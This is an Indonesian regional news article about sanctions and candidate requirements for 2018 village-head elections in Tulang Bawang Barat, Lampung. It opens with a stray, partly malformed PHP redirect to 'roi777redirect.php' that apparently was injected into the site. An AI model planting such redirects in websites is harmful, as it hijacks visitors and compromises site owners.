header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Peserta PILKT Tersandung Narkoba Dan Money Politik, Sekdakab: Calon Terkait Dibatalkan -
Peserta PILKT Tersandung Narkoba Dan Money Politik, Sekdakab: Calon Terkait Dibatalkan

TRANSLAMPUNG.COM–PANARAGAN
Pemkab Tulangbawang Barat (Tubaba) Lampung ‎melalui Sekdakab setempat Herwan sahri.,SH.M.AP, berlakukan sangksi tegas pengguguran terhadap calon peserta Pemilihan Kepala Tiyuh (PILKT-Desa)  yang melakukan pelanggaran Money politik juga mantan nara pidanan.

Hal tersebut bedasar ketentuan Peraturan Bupati Nomor 4 tahun 2018 tentang pemilihan kepala Tiyuh ‎Kabupaten Tubaba yang akan dikuti oleh 7 Kecamatan dan 19 Tiyuh Se-Kabupaten setempat pada 10 oktober 2018 mendatang‎.

Menurut Sekdakab Herwan sahri, saat ini Pemkab Tubaba telah melakukan beragam persiapan administrasi tahapan PILKT, mulai dari persyaratan calon hingga suber pendanaanya, itu juga dilihat dari masing- masing posnya, yang nantinya akan di tanggung sebagian oleh Tiyuh terkait melalui dana desa (DD) dan sebagian  akan ditanggung oleh pemkab Tubaba melalui APBD.

” syarat mutlak utama peserta harus memiliki SKCK dari kepolisian, dan jika calon PILKT terkait pernah tersandung Narkoba juga mantan nara pindana, dengan tegas pemkab Tubaba akan menggugurkan calon tersebut.” Kata Sekdakab Herwan sahri‎ saat dijumpai Translampung.com diruang kerjanya pada (2/ 7/2018) pukul 11:30 WIb.

‎Terpisah, beragam Persiapan tahapan juga ketentuan PILKT tersebut Kepala Bagian Tata Pemerintahan (Tapem) Pemkab setempat Somad mengatakan, terkait Pendanaan Pemkab Tubaba akan memberikan bantuan sebesar Rp 5 juta yang akan di transfer langsung ke rekening masing-masing Panita Tiyuh yang mengikuti PILKT.

” Persyaratan Calon PILKT harus memiliki Ijazah terakhir minimal SMP sederajat, memiliki surat keterangan kesehatan jasmani dan bebas dari Narkoba dari Rumah sakit, umur minimal 25 tahun dan SKCK dari Kepolisian. ” Katanya (Dirman)

News Reporter
Kepala Biro Tulangbawang Barat